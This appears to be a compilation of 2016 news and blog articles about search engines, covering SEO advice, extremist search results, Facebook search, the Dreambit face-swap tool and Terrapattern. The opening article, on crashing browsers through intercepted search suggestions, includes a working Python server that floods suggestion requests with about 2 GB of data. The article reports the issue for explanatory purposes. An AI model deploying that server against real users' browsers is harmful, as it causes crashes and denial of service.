Security researchers from Nightwatch Cybersecurity have discovered a way of crashing Chromium and Firefox browsers on mobile and desktop devices.

Their method relies on the search suggestions feature that these browsers support. The issue is not a software bug but a design decision that makes the attack possible.

Most of today's browsers have a search field or allow users to search via the URL address bar. Based on the search engines supported inside the browser, search suggestions can be shown as the user types their query.

2GB search suggestion reply

Nightwatch's researchers say that if a browser's search engine provider doesn't deliver these search suggestions over an encrypted HTTPS channel, an attacker on the local network can intercept the suggestion queries and answer before the search provider does.

An attacker can insert large chunks of data inside this response, which can lead to the browser or the operating system exhausting memory resources and eventually crashing.
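
To make the mechanism concrete, below is a minimal, purely illustrative Python sketch (not the researchers' tooling) of a rogue suggestion endpoint that answers every query with a multi-gigabyte JSON reply; a test browser configured to fetch suggestions from it over plain HTTP would try to buffer the oversized response. The port and payload size are assumptions.

from http.server import BaseHTTPRequestHandler, HTTPServer
import json

# ~1 MB chunk shaped like an OpenSearch suggestion reply: ["query", ["suggestion", ...]]
CHUNK = json.dumps(["q", ["A" * 1024] * 1024]).encode()
REPEATS = 2048  # roughly 2 GB in total, the order of magnitude cited in the report

class OversizedSuggestions(BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer any suggestion query with an enormous body; the repeated chunks
        # are not one valid JSON document, but the sheer size is what matters here.
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(CHUNK) * REPEATS))
        self.end_headers()
        for _ in range(REPEATS):
            self.wfile.write(CHUNK)

if __name__ == "__main__":
    # Serve locally; pointing a test browser's suggestion URL at this endpoint
    # demonstrates the resource exhaustion without touching any real provider.
    HTTPServer(("127.0.0.1", 8080), OversizedSuggestions).serve_forever()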

The good news is that researchers weren't able to execute malicious code during these crashes, which would have caused more problems for browser makers.

During their tests, the researchers managed to crash the Android stock browser on Android 4.4, Chrome 51 on Android 6.0.1, and Firefox 47 on Ubuntu 16.04. They also crashed the entire Ubuntu 16.04 OS while running Chrome 51.

Not a security issue, so a bugfix is coming later in the year

In order for this crash to occur, as mentioned above, users need to use a built-in search provider that doesn't employ HTTPS. The list includes eBay on Firefox, AOL and Ask.com on Chrome, and Bing and Yahoo on Android's stock browser.

Internet Explorer, Edge, and Safari aren't affected by this issue. Safari had to deal with its own search-induced crash at the start of the year, so its reputation is not as clean as you might think.

The Android, Chrome, and Firefox teams declined to classify this bug as a security issue, since it actually isn't, meaning that a fix will be coming later rather than sooner.


http://news.softpedia.com/news/chrome-firefox-vulnerable-to-crashes-via-search-suggestions-506722.shtml

Categorized in Search Engine

In my colleague Matt Lester’s recent Search Engine Land column, he discussed ten tips for a more effective paid search campaign. For this article, I’ll follow up Matt’s advice with ten tips to help you develop a more effective search engine optimization (SEO) campaign. But before we dive into the tips, let’s briefly look at what SEO is and its key concepts.

SEO, quite simply, involves designing your website to improve its ranking in organic search results on search engine results pages (SERPs). And by optimizing for the terms your target audience actually searches with, you will drive relevant traffic to your site that converts at a better rate.

The key concepts in SEO (credit to Search Engine Land Features Editor Vanessa Fox for the inspiration on this) are straightforward: relevance, discoverability, and crawlability. Relevance means keeping to a topic and helping the search engine understand what your site is about (ideally it’s about one thing in particular). Discoverability means telling the world about your site. The technical details and environment may have changed, but search marketing is still just marketing. Get your website out there, communicate with the online world and your users. And finally, crawlability means making the site accessible. Search engines regularly send out automated programs called web crawlers, and it’s these crawlers that will visit your site and try to understand your content. Help the search engine crawlers find every page on your site and make sure they can understand what they’re seeing.

And now for the Top 10 SEO Tips:

1. Keyword research is the first step in SEO. Take the time to figure out what words are used by the people you want to visit your site, and then use these words on the relevant page. In particular, make sure you use these keywords in the first few words of your page title because this is the most important bit of the page from a search engine’s perspective.

2. Get trustworthy advice from SEO sources on the web. Unfortunately, not everyone knows as much as they say they do online, and far too often SEO forums are full of bad advice; choose your sources well. A few we recommend: Google engineer Matt Cutts’ blog, Search Engine Journal, SEOmoz, and of course, Search Engine Land.

3. Look after your code. This means building a website that is easy for the search engines to understand. Your website should make use of up-to-date technologies like Cascading Style Sheets (CSS) to minimize the amount of formatting in the HTML page code.

4. Make navigation easy. You can do this by building clear text links to all parts of your site. Search engines can’t follow image links or clever animated links like Flash; they like their navigation plain and simple—and so do many users.

5. Get links from trusted, relevant sources. Links are like a vote for your site and you can’t rank well without them. Unfortunately, buying links or being indiscriminate in the places you link to and places you request links from is no longer a good way to raise the importance of your site; think quality, not quantity. Links must be relevant to the content of your site and they must be from reputable websites.

6. Build a sitemap page. Building a sitemap helps search engines discover every page in your website. The best sitemaps list the pages in your site along with brief keyword-rich descriptions of each page. If your site has a large number of pages, create as many sitemaps as you need and make sure they’re linked together. (A short sketch of generating a basic XML sitemap appears after tip 10.)

7. Don’t forget the technical stuff. There is a lot happening technically in the background that can cause problems with the way the search engines see your site. For example, if you use a cheap web hosting company, you might be bundled on to the same web server as a pornographic site that Google really doesn’t like—guilt by association. Also, does your website use techniques that search engines don’t like, like certain types of redirection? If in doubt, ask your web design company.

8. Track your progress with a web analytics program. There are lots of options to use; Google Analytics in particular is easy to use, versatile, and it’s free. Web analytics can tell you a great deal about how people interact with your site and how much traffic the search engines are sending you.

9. Tell search engines where you are. You can do this by submitting your site details to search engines. This doesn’t guarantee a better position in the results, but it certainly helps. Google, Yahoo, and Microsoft all have a facility to submit a list of all the pages in your site.

10. Remember that content is king. Building great content and keeping it up to date is the key to SEO. Search engines love sites like blogs, which are highly topical and regularly refreshed. But always remember to put your visitors first—at the end of the day, even a site that ranks well and gets lots of traffic is no good if the visitors don’t like what they see.
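
Following up on tip 6, here is a minimal sketch of generating a basic XML sitemap from a list of pages. The example.com URLs and the page list are hypothetical; a real site would typically add fields such as lastmod or generate the file directly from its CMS.

from xml.sax.saxutils import escape

# Hypothetical pages; on a real site this list would come from your CMS or a crawl.
pages = [
    "https://www.example.com/",
    "https://www.example.com/blue-widgets/",
    "https://www.example.com/contact/",
]

def xml_sitemap(urls):
    # One <url> entry per page, using the standard sitemaps.org namespace.
    entries = "\n".join(f"  <url><loc>{escape(u)}</loc></url>" for u in urls)
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">\n'
        f"{entries}\n"
        "</urlset>"
    )

print(xml_sitemap(pages))  # save the output as sitemap.xml in the site root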

As I said, these are my top ten SEO tips. There are many others, but these are tried and true methods to get your company moving in the right direction… up to the top of search engine results pages.

http://searchengineland.com/10-fundamental-tips-to-improve-your-seo-14024

As search engine optimization (SEO) professionals, we obsess over search data from a wide variety of resources. Which one is best for our clients? Which keyword research tool reveals the most accurate search behaviors when rebuilding a site’s information architecture? Does our web analytics data validate our keyword research?

And, more importantly, did these tools provide your most desired information? Some answers might surprise you.

Keyword research data

I love keyword research tools. I use all of them because I can discover core keyword phrases, which are commonly used across all of the commercial web search engines. And I can also tailor ads and landing pages to searchers who typically use a single, targeted search engine (and it isn’t always Google, as one might imagine).

However, keyword research tools are not a substitute for a knowledgeable and intuitive search engine marketer. All too often, website owners and even experienced search engine optimization professionals launch into a site’s information architecture without gauging user response. As good SEO professionals, we should understand when it is appropriate to implement keywords into a site’s information architecture, when keyword usage overwhelms users, and when keyword usage needs to be more apparent.

This situation occurred recently when I was performing some usability tests on a client site’s revised information architecture. This particular client website is being delivered in multiple languages. We were testing American English, British English, and French. Therefore, the test participants were American, British, and French.

All of the keyword research tools showed the word “student” or “students” (in French, “étudiant” or “étudiants”) as a possible target. The appearance of this word in both keyword research data and in the site’s web analytics data led my client to believe that we should make this area a main category.

If we had relied on the data from keyword research tools, we would have been wrong. If we had relied on the data from web analytics software, we would have been wrong.

The face-to-face user interaction gave us the right answer.

The facial expressions were enough to convince me. Almost every single time the word “student” or “étudiant” appeared during the usability test, I saw confusion. When I asked test participants why they seemed confused, they said that the particular keyword phrase was not appropriate for that type of website. They then placed the student-related information groupings in one of two piles:

  • Discard – Participants felt that the information label and/or grouping did not belong on the website at all.
  • Do not know – Participants were unsure whether the information label and/or grouping belonged on the website.

The discard pile won, with over 90% from all three language groups.

Now, imagine if this company did NOT have one-on-one interaction with searchers during the redesign process and only relied on keyword research tools. How much time and money might have been wasted?

Keyword research data is not the only type of data that can be easily misinterpreted.

Web analytics search data

One search metric that clients and prospects inevitably mention is “stickiness.” In other words, one of their search marketing goals is to increase the number of page views per visitor via search engine traffic, especially if the site is a publisher, blog, or news site. Increasing the number of page views per visitor provides more advertising opportunities as well as a positive branding impact. The average time on site (if it is longer than two minutes) is also commonly viewed as a positive search metric.

Or so it might seem. Here is an example.

Many SEO professionals, including me, provide blog optimization for a wide variety of companies (ecommerce, news, software, etc.). Not only do we provide keyword research for blogs, we must also monitor the effectiveness of keyword-driven traffic via web analytics data.

Upon initial viewing, the blog’s analytics data might indicate increased stickiness. Searchers are reading more blog entries. Searchers are engaged. Therefore, the blog content is great…that is a common conclusion.

For an exploratory usability test, I ask test participants to tell me about a blog post that they found very helpful. I ask them why they liked the blog’s content, and I listen very closely for keyword phrases. Audio and/or video recording makes this job a little easier.

When I asked test participants to refind desired information on a blog on the lab’s computer, I did not hear, “This blog content is great!” Comments I frequently heard were:

  • “I can’t find this [expletive] thing.”
  • “Now where could it be? I saw it here before….”
  • “I think this was posted in [month/day/year]….”
  • “Where the [expletive] is it?”

As you might imagine, the use of expletives became more and more frequent with the increased number of page views.

Sure, searchers who discover great blog content might bookmark the URL, or they might link to it from a “Links and Resources” section of their web site, or they might cite the URL in a follow-up post on another website. All of these actions and associated behaviors make it easier for searchers to refind important information.

However, when I review web analytics data, I often find that site visitors do not take these actions as frequently as people might think. Instead, with careful clickstream analysis combined with usability testing, I see that the average page view per visitor metric is heavily influenced by frustrated refinding behaviors.

Conclusion

I have always believed that search engine optimization is part art, part science. Certainly, keyword research data and web analytics data are very much part of the “science” side of SEO.

Nevertheless, the “art” part of SEO comes into play when interpreting this data. By listening to users and observing their search behaviors, having that one-on-one interaction, I can hear keywords that are not used in query formulation. I study facial expressions and corresponding mouse movements that are associated with keywords. I see how keywords are formatted in search engine results pages (SERPs) and corresponding landing pages, and how searchers react to that formatting and placement.

I cannot imagine my job as an SEO professional without keyword research tools and web analytics software. In addition, I cannot imagine my job as an SEO professional without one-on-one searcher interaction. What do you think? Have any of you learned something that keyword research tools and/or web analytics data did not reveal?

http://searchengineland.com/when-keyword-research-and-search-data-deceives-14613

Categorized in Search Engine

This is a sponsored post written by me on behalf of Bing Network. All opinions are 100% mine.

I’ve always been fascinated by the constant evolution of search. It scares me to accept that I’ve never been able to get the full grasp of these changes. I couldn’t sit still.

My career was built on writing and consulting about SEM. I should be prepared for the future. I should know what’s coming next. But, I don’t.

The future of search has me in a constant spin cycle.

Do you feel this way? Bing has 133 million monthly searches. Google hit over 100 billion. That’s a lot to take in. The good news is this hasn’t stopped me (or others!) from digging into these changes.

This past year working at SEJ has allowed me to explore new strategies to help explain the future of SEM. I discovered that I’ve been looking at the future of search all wrong. And, I think a lot of us have.

What is the Future of Search?

I’ve worked with more than 100 SEM clients. The majority of them focused only on increasing their rankings on Google.

This is where I went wrong.

I shouldn’t be focused on increasing rankings in Google, creating more content, or building more links. I should be focused on the user.

In 2016, we’re seeing marketers approach this in different ways:

Understanding searcher intent – Making it easier for searchers to get better results by personalizing our content to answer typed queries and voice searches.

Exploring multiple search channels – Building a search strategy outside of Google that reaches your target audience on the platforms where they spend their time.

Rand Fishkin has an amazing Slideshare on this:

The 7 Biggest Trends in SEO: 2016 from Rand Fishkin

For example, Confluent Forms worked with Michlin Metals to optimize for intent-based search. Confluent Forms altered the metadata and saw an upward spike in impressions, clicks, click-through rate, and position. They were even featured in a Google Answer Box. Optimizely increased conversions by 32% for Secret Escapes by matching user intent with expectation between landing page copy and PPC ads.

And, let’s not forget about the other search channels. Marin Software grew Sykes Cottage conversion volume on Bing by 259%. Hello Society increased referral traffic from 3,952 to 16,592 in one month on Pinterest.

All of this is how I now understand search will work in the future. Yep, I was missing the whole point all along.

In 2000, my main channels were paid search and organic search. Fast forward to 2016: to compete, you must be on paid, organic, local, image, video, map, social, news, mobile, and voice search.

Whew! That’s a lot!

Does this New Way of Search Marketing Work for Big or Small Brands?

The short answer: Both.

Businesses spend thousands of dollars on PPC and SEO campaigns each year looking for the right audience. Utilizing tools like Bing’s Remarketing campaigns allows both big and small brands to benefit from targeting consumer buying behaviors for better ad conversions with minimal spend. AdWords also offers remarketing ads, so I’d suggest analyzing both avenues before allocating your budget.

In my experience, smaller brands with a limited budget see greater success on Bing because the cost-per-click has been lower. WordStream also found CPCs an average of 33.5% cheaper on Bing.

In addition to advertising, businesses will also need to adapt to the new way users are searching. According to comScore, 50% of all searches will be voice searches by 2020. Voice search uses a more natural tone, which changes the search results.

Tech goliaths like Microsoft, Apple, and Google are focusing on new digital assistants, like Cortana. Cortana (iOS, Android, Windows) has already seen 2.5 billion questions asked globally. Pretty crazy, huh? Digital assistants are transforming how searchers use mobile. Searchers are bypassing Google search and using apps or voice search for their queries.

This means more opportunities for marketers to influence consumers and measure the impact of search on other channels.

Takeaways

It seems to me that the next generation of search will rely on helping businesses personalize their brand to reach a very niche audience. There is a whole new side for SEM marketers to explore — and potentially some awesome benefits, too!

  • Brands can expand their reach by utilizing multiple search engines.
  • Content based on user intent and conversational language will have a greater impact.
  • Investing in personalized ad campaigns can bring in higher conversions.

For all the work we do perfecting our strategies, perhaps these coming years will bring us the opportunity to engage on a deeper, more meaningful level, not only with our audience but with our brands too.

I’d love your thoughts on this! Feel free to discuss in the comments or on Twitter.

https://www.searchenginejournal.com/search-marketing-is-the-future-right/169326/

More than 484,000 Google keyword searches a month from around the world, including at least 54,000 searches in the UK, return results dominated by Islamist extremist material, a report into the online presence of jihadism has revealed.

The study found that of the extremist content accessible through these specific keyword searches, 44% was explicitly violent, 36% was non-violent and 20% was political Islamist in content, the last being non-violent but disseminated by known Islamist groups with political ambitions.

The study is one of the first to expose the role of the search engine rather than social media in drawing people to extremist jihadi material on the web. It argues the role of the search engine – a field dominated by Google – has been a blind spot that has been missed by those seeking to measure and counter extremist messages on the internet.

Although the UK government’s Prevent strategy claims the internet must not be ungoverned space for Islamist extremism and British diplomats have taken the lead in the global communications fight against Islamic State on the net, the study suggests government agencies are only at the beginning of a “labyrinthine challenge”. So-called counter-narrative initiatives led by governments and civil society groups are “under-resourced and not achieving sufficient natural interest”, suggesting the battle of ideas is not even being engaged, let alone won.

The study, undertaken jointly by Digitalis and the Centre on Religion and Geopolitics, will be challenged by those who claim it advocates censorship, has blurred the lines between political Islam and violent extremism and cannot validly quantify the presence of extremism.

But the findings come in a week in which there has been a spate of terrorist attacks in Germany and France, some undertaken by young people either radicalised on the internet, or using it to feed their obsession with violence. Many of the jihadist foreign fighters in Syria were radicalised online as “the search engine gradually overtakes the library and the classroom as a source of information”.

The study, entitled A War of Keywords: how extremists are exploiting the internet and what to do about it, argues “many of the legitimate mainstream Islamic scholarly websites host extremist material, including jihadi material, often without any warning or safeguards in place”.

It also argues non-violent Islamist organisations, such as Hizb ut-Tahrir, have a very strong online presence and dominate the results for some keyword searches. Some of the most popular search words used were crusader, martyr, kafir (non-believer), khilafa (a pan-Islamic state) or apostate.

In a condemnation of government efforts it finds very little of this content is challenged online. Analysing 47 relevant keywords, the search-engine analysis found counter-narrative content outperformed extremist content in only 11% of the results generated. For the search term khilafah, which has 10,000 global monthly searches, the ratio of extremist content to counter-narrative is nine to one.

This is partly because counter-narrative sites lack search engine optimisation, so they do not rank high enough in searches. By contrast, Khilafa.com, the English website of Hizb ut-Tahrir, had more than 100,000 links into it.

The study also warns some of the most-used Muslim websites such as Kalmullah.com and WorldofIslam.info “host traditional Islamic content alongside extremist material” so are knowingly or unknowingly abusing the trust of their readers.

The study also claims a user can come across extremist content relatively easily while browsing for Islamic literature. Few effective restrictions apply to accessing Islamic State English-language magazine Dabiq or Inspire magazine, which is linked to al-Qaeda in the Arabian peninsula. Both are readily available to browse and download through clearing sites.

The study produced its headline numbers by looking at the average monthly number of global searches conducted in Google for 287 extremist-related keywords – 143 in English and 144 in Arabic. It then looked at two samples totalling 47 keywords, the first sample focused on the most-used words and the second sample on the keywords deemed to be most extremist. The research then analysed the first two pages thrown up by the search for these keywords.

The authors acknowledge the difficulties technology companies face in policing the results of their search engines. Google is responsible for 40,000 searches a second, 2.5 billion a day and 1.2 trillion a year worldwide. Facebook boasts more than one and a half billion users who create 5 billion likes a day.

Dave King, chief executive of Digitalis, argues: “While the company’s advertising model is based on automatically mining the content its users create, their ability to distinguish a single credible kill threat from the plethora who have threatened to kill in jest is highly limited.”

The study recommends governments, the United Nations, technology companies, civil society groups and religious organisations together establish a charter setting out a common definition of extremism and pledge to make the internet a safer place.

Technology companies, the report says, could work with governments to shift the balance of the online space, as well as share analytical data and trending information to bolster counter-efforts. It suggests search engine companies have been reluctant to or unable to alter the search algorithms that are responsible for search page rankings.

The authors also call for a debate on “the murky dividing line between violent and non-violent extremist material online”, arguing such legal definitions have been achieved over “copyrighted material, child pornography and hate speech all of which have been subject to removal requests.”

Existing content control software that prevents access to graphic or age-restricted material could be used, and warning signals put on sites.

A Google spokesperson said: “We take this issue very seriously and have processes in place for removing illegal content from all our platforms, including search. We are committed to showing leadership in this area – and have been hosting counterspeech events across the globe for several years. We are also working with organisations around the world on how best to promote their work on counter-radicalisation online.”

https://www.theguardian.com/technology/2016/jul/28/search-engines-role-in-radicalisation-must-be-challenged-finds-study

Categorized in Search Engine

Facebook Inc (NASDAQ:FB) wants to be a popular place to search for mentions of current news, in order to capture more of the public chatter that normally happens on Twitter, says a report from TechCrunch. The social networking site stumbled with its natural language Graph Search, refocused on keywords, and is now seeing 2bn searches per day across its 2.5 trillion posts. In comparison, it was 1bn in September 2012 and 1.5bn searches per day in July 2015 – a 33% jump in just 9 months.


Facebook wants to rule chatting space

On the recent earnings call, the Chief Executive – Mark Zuckerberg – said, “The growing way that people use search is to find what people are saying about a topic across more than 2.5 trillion posts. Now people are doing more than 2 billion searches a day between looking up people, businesses, and other things they care about.”

What the co-founder did not say, but certainly indicated, was that the social network thinks people should talk about things on its site because their words will find new audiences thanks to its massive user base and powerful search engine, the report says. This chatting space is actually ruled by Twitter, but since launching public post search last year, Facebook Inc (NASDAQ:FB) has been attempting to dominate it.

Through paid search ads, the social media giant could open up new monetization opportunities if it can keep generating more search queries. However, the CEO cautioned that it was not going to happen overnight.

How does it plan to do it?

Initially, Facebook’s search engine focused primarily on helping users find people they had met in real life and add them as friends. Then in 2013, the social network touted its semantic Graph Search engine as the third pillar of its service alongside the profile and feed. Users were, however, confused by the complex search queries required.

Eventually, the tech giant retreated from Graph Search and released true keyword search in late 2014 to allow users to find posts by themselves or their friends. Later, the firm expanded that to include all 2 trillion posts on the social network.

For Facebook Inc (NASDAQ:FB), it was a huge turning point because it pitted its search engine finally against Twitter. The main aim of the social network is to underline why people should talk more on its network. For this, the social media giant built a special sports chatter feature called Stadium, and also focused on Facebook Live for citizen journalism.

Zuckerberg, on being asked about monetizing commercial searches, did hint at keeping the search business model for later. Even though this announcement was about search, it’s Twitter that should be concerned, not Google.

On Wednesday, Facebook shares closed up 1.75% at $123.34. Year to date, the stock is up over 16% while in the last one-year, it is up over 27%.

http://learnbonds.com/130381/facebook-battles-twitter/

Categorized in Others
  • Type terms in the search engine and AI mines for related images
  • Uses facial processing, recognition, 3D reconstruction, age progression
  • Can be used to identify missing children years after they have gone missing
  • Also shows actors/actresses how they would appear in a specific role

Trying to picture yourself older or with a different hairstyle is near impossible.

But now researchers have developed the ultimate face swap that analyzes a picture of your face, searches for images using key terms and seamlessly maps your face onto the results.

Called Dreambit, this AI lets anyone see what they would look like with a different hairstyle or colour, or in a different time period, age, country or anything that can be queried in an image search engine.

Dreambit lets anyone see what they would look like with a different hairstyle or colour, or in a different time period, age, country or anything that can be queried in an image search engine - as it has done with American actor George Clooney (pictured).

'Dreambit is a personalized image search engine,' reads the website.

Although currently only in a closed beta, the site is expected to open to all comers later this year.

'Given one or more photos and a text query, it outputs versions of the input person in the query appearance.'

This software is the brainchild of Ira Kemelmacher-Shlizerman, who is a computer vision researcher at the University of Washington.

 

To transform themselves, users type any terms in the search engine, such as 'curly hair,' 'India' or '1930' and the software will mine through Internet photo collections for similar images in that specific category.


Dreambit draws on previous research from the university and other work in facial processing, recognition, three-dimensional reconstruction and age progression, combining those algorithms in a unique way to create the blended images.


Not only will this software create pictures of you 15 years older or give you the long, lush locks you have always wanted, it is also helpful for identifying missing children or individuals evading the law who purposely disguise themselves.

Many children who go missing unfortunately aren't found until many years down the road – if ever.

HOW DOES DREAMBIT WORK?

Users first upload a picture of themselves

 

Dreambit is a personalized image search engine.

This AI analyzes a picture of your face, searches for images using key terms and seamlessly maps your face onto the results.

Users can type in any term in the search engine, such as 'curly hair,' 'India' or '1930' and the software will mine through Internet photo collections for similar images in that specific category - then maps your face onto the result.

The software lets anyone see what they would look like with a different hairstyle or colour, or in a different time period, age, country or anything that can be queried in an image search engine.


This new system is capable of projecting a face to an advanced age with close accuracy – it has predicted how a 1-year-old boy and a 4-year-old girl would look at later ages.

Kemelmacher-Shlizerman and her team previously created automated age progression software that focused just on the person's face, but this new AI can add varied hairstyles and other contextual elements.


The AI's new feature lets parents imagine what their child might look like five or 10 years from now under different circumstances — with red hair, curly hair, black hair or even a shaved head.

'It's hard to recognize someone by just looking at a face, because we as humans are so biased towards hairstyles and hair colors,' said Kemelmacher-Shlizerman.

'With missing children, people often dye their hair or change the style so age-progressing just their face isn't enough.'

Users type any terms in the search engine, such as 'curly hair,' 'India' or '1930' and the software will mine through Internet photo collections for similar images in that specific category. Then it will seamlessly map your face onto the results, as the software has done with the American actress Keri Russell (pictured)

'This is a first step in trying to imagine how a missing person's appearance might change over time.'

Another application for the technology will let actors or actresses envision how they might appear in a specific role.

 

Not only will this software create pictures of you 15 years older or give you the long locks you have always wanted, it is also helpful for identifying missing children or individuals evading the law who purposely disguise themselves. Dreambit has predicted a 1-year-old boy and 4-year-old girl at subsequent ages (pictured)

For example, the system can marry internet photographs of the actress Cate Blanchett and Bob Dylan to predict how she would appear playing the Dylan role in the movie 'I'm Not There.'

'This is a way to try on different looks or personas without actually changing your physical appearance,' said Kemelmacher-Shlizerman, who co-leads the UW Graphics and Imaging Laboratory (GRAIL).

'While imagining what you'd look like with a new hairstyle is mind blowing, it also lets you experiment with creative imaginative scenarios.'

The software system analyzes the input photo and searches for a subset of internet photographs that fall into the desired category but also match the original photo's face shape, pose and expression.

Another application for the technology will let certain actors or actresses envision how they might appear in a role. For example, the system can marry internet photographs of the actress Cate Blanchett and Bob Dylan (pictured) to predict how she would appear playing the Dylan role in the movie 'I'm Not There'

Its ability to accurately and automatically synthesize two photographs stems from the combination of algorithms that Kemelmacher-Shlizerman assembled, as well as the sheer volume of photos available on the internet.

'The key idea is to find a doppelgänger set — people who look similar enough to you that you can copy certain elements of their appearance,' said Kemelmacher-Shlizerman.

'And because the system has hundreds of thousands of photos to choose from, the matching results are spellbinding.'
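
Dreambit's actual matching pipeline is not published here, but the 'doppelgänger set' idea can be roughly sketched as a nearest-neighbour search over face embeddings. In the illustrative Python below, the embeddings, the candidate collection, and the vector size are stand-ins for the real system's face shape, pose and expression matching.

import numpy as np

def cosine_similarity(a, b):
    # Similarity between two face embedding vectors.
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))

def doppelganger_set(query_vec, candidates, k=10):
    """candidates: list of (photo_id, embedding) for photos matching the text query."""
    scored = [(pid, cosine_similarity(query_vec, vec)) for pid, vec in candidates]
    scored.sort(key=lambda x: x[1], reverse=True)
    return scored[:k]  # the k most look-alike photos become blending candidates

# Toy usage: random vectors stand in for real face embeddings.
rng = np.random.default_rng(0)
query = rng.normal(size=128)
collection = [(f"photo_{i}", rng.normal(size=128)) for i in range(1000)]
print(doppelganger_set(query, collection, k=5))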

 

MIND-READING AI KNOWS WHO YOU ARE THINKING ABOUT

 

New research from the Kuhl Lab at the University of Oregon has revealed that computers can now analyse brain scans and work out who a person is thinking about.

The AI system can even create a digital portrait of the face in question.

Researchers began their work with more than 1,000 coloured images of different human faces.

 

 

Researchers have reconstructed a face after peering into the mind of another by extracting latent face components from neural activity and using machine learning to create digital portraits. Researchers worked with more than 1,000 coloured images of different human faces

During the first part of the study they showed participants one face after another while performing fMRI scans and recorded neural responses during this time.

Researchers used an innovative form of fMRI pattern analysis to test whether lateral parietal cortex actively represents the contents of memory.

Using a large set of human face images, they first extracted latent face components, known as eigenfaces.

Then machine learning algorithms were used to predict face components from fMRI activity patterns and reconstruct images of individual faces in digital portraits.
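
As a rough illustration of that pipeline (not the Kuhl Lab's actual code), the sketch below uses synthetic data: PCA extracts eigenface components, a ridge regression maps fMRI voxel patterns to those components, and faces are reconstructed from the predicted components. All dimensions and data here are assumptions.

import numpy as np
from sklearn.decomposition import PCA
from sklearn.linear_model import Ridge

rng = np.random.default_rng(0)
faces = rng.normal(size=(1000, 64 * 64))   # 1,000 face images, flattened to pixels
voxels = rng.normal(size=(1000, 500))      # matching fMRI activity patterns

pca = PCA(n_components=50).fit(faces)      # eigenfaces live in pca.components_
components = pca.transform(faces)          # latent face components per image

model = Ridge(alpha=1.0).fit(voxels, components)   # brain activity -> face components

predicted = model.predict(voxels[:5])              # predict components from activity
reconstructed = pca.inverse_transform(predicted)   # digital "portraits" as pixel arrays
print(reconstructed.shape)                         # (5, 4096)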

This process is similar to how the mind's eye sees a person, as object recognition passes through several stages, from the moment we lay eyes on something to the point we know exactly what it is.

http://www.dailymail.co.uk/sciencetech/article-3702341/The-ultimate-face-swap-New-search-engine-face-hairstyle-reveal-ll-age.html

Categorized in Search Engine

SANTA FE, NM--(Marketwired - June 29, 2016) - The leading provider of online reviews, CrowdReviews.com, has released a set of tips to assist businesses in finding digital marketing agencies offering exceptional SEO services based on their own needs and requirements. The tips outline strategies businesses can use to determine whether a company has an extended history of positive reviews. While they do not guarantee results, the tips can help reduce the risk of selecting a search engine optimization agency that consistently fails to meet its clients' expectations.

CrowdReviews.com first recommends that buyers consider search engine optimization agencies which have a history of in-depth reviews written by their customers. As the Internet has become a primary source for research, it has also become an opportunity for many companies to create their own reviews. Buyers are advised not only to look for reviews which may be critical of online marketing agencies, but to consult multiple reviews and sources. Many vendors will include testimonials on their website; CrowdReviews.com provides reviews on vendor profiles as a means of allowing buyers to judge how much weight the reviews carry regarding the quality of the service.

Second, it is recommended for businesses to receive quotes from multiple SEO companies. Online marketing agencies should be able to provide a detailed quote for the services they are offering including their search engine optimization. Being able to compare quotes between multiple vendors can identify those which pay more attention to the needs of their customers and those which put more effort into their SEO clients compared to companies that try to service as many as possible with as few resources as possible.

http://www.marketwired.com/press-release/crowdreviewscom-reveals-tips-for-selecting-search-engine-optimization-companies-2138418.htm

Categorized in Search Engine

Thanks to a small team of artists and coders, you may now explore cities through patterns of infrastructure as captured in aerial photography. Terrapattern, developed at the Carnegie Mellon Frank-Ratchye STUDIO for Creative Inquiry, is the first open-access visual search tool for satellite imagery. It is currently available for Pittsburgh, San Francisco, New York City, Detroit, Austin, Miami, and Berlin. This means you may scan these cities’ landscapes for common forms of your particular interest that are not conventionally labelled on a map: circular backyard pools or cul-de-sacs, perhaps, or even dilapidated nautical wrecks. All you have to do is find the tile of topography that intrigues you, and dozens of search results of similar views will arrive courtesy of machine learning algorithms trained to sift through images from OpenStreetMap. You can then export these images as a geographic text file.
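
Terrapattern's own model and index are not reproduced here, but the general pattern it describes, embedding every tile, finding the nearest neighbours of a chosen tile, and exporting the matches as a geographic file, can be sketched as follows; the embeddings, coordinates and GeoJSON output in this Python example are illustrative stand-ins.

import json
import numpy as np

def nearest_tiles(query_vec, tile_vecs, k=24):
    """tile_vecs: array of shape (n_tiles, dim); returns indices of the k most similar tiles."""
    q = query_vec / np.linalg.norm(query_vec)
    t = tile_vecs / np.linalg.norm(tile_vecs, axis=1, keepdims=True)
    return np.argsort(t @ q)[::-1][:k]

def export_geojson(indices, tile_coords, path="results.geojson"):
    # Write the matched tile centres as a geographic text file.
    features = [
        {"type": "Feature",
         "geometry": {"type": "Point", "coordinates": tile_coords[i]},
         "properties": {"rank": rank}}
        for rank, i in enumerate(indices)
    ]
    with open(path, "w") as f:
        json.dump({"type": "FeatureCollection", "features": features}, f)

# Toy usage: random embeddings and coordinates stand in for real map tiles.
rng = np.random.default_rng(0)
tile_vecs = rng.normal(size=(5000, 256))
tile_coords = rng.uniform([-80.1, 40.3], [-79.8, 40.6], size=(5000, 2)).tolist()
export_geojson(nearest_tiles(tile_vecs[0], tile_vecs), tile_coords)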

There is an alluring and satisfying poetry in the composite images formed by the results of scattered sites brought together, but you’re probably wondering what useful purpose Terrapattern might serve. STUDIO for Creative Inquiry’s director and new-media artist, Golan Levin, who headed the project, emphasizes that the team did not create Terrapattern with a specific objective in mind. Rather, working with developer David Newbury, artist Kyle McDonald, and students Irene Alvarado, Aman Tiwari, and Manzil Zaheer, he hopes their tool will allow users to do whatever they would like with it, whether that means using it to understand the environment or for humanitarian projects or even for pure recreation. One of Levin’s friends is hunting for empty swimming pools to jump into for guerrilla skateboarding. Online, the team references initiatives by the Monitoring of the Andean Amazon Project and by DataKind.org as precedents. In this sense, Terrapattern is intended, as its developers put it, to “democratize geospatial intelligence,” providing the everyday person with a power that lies largely in the hands of state actors or big corporations. But Levin also considers it an artwork that provides people with new insight into their cities.

“My hope for this project [is] that it is an influential prototype that allows people to suddenly think in a new way about satellite imagery,” Levin told Hyperallergic. “It’s what I would call a revelatory artistic practice, in which I’m trying to allow people to see the world in a new way. To give people this kind of view — this kind of panoptic perceptron that allows them to see connections in the landscape that they couldn’t see before — is a power that I’m really pleased to be able to present in the form of an interactive networked artwork.”

Purple tennis courts in San Francisco

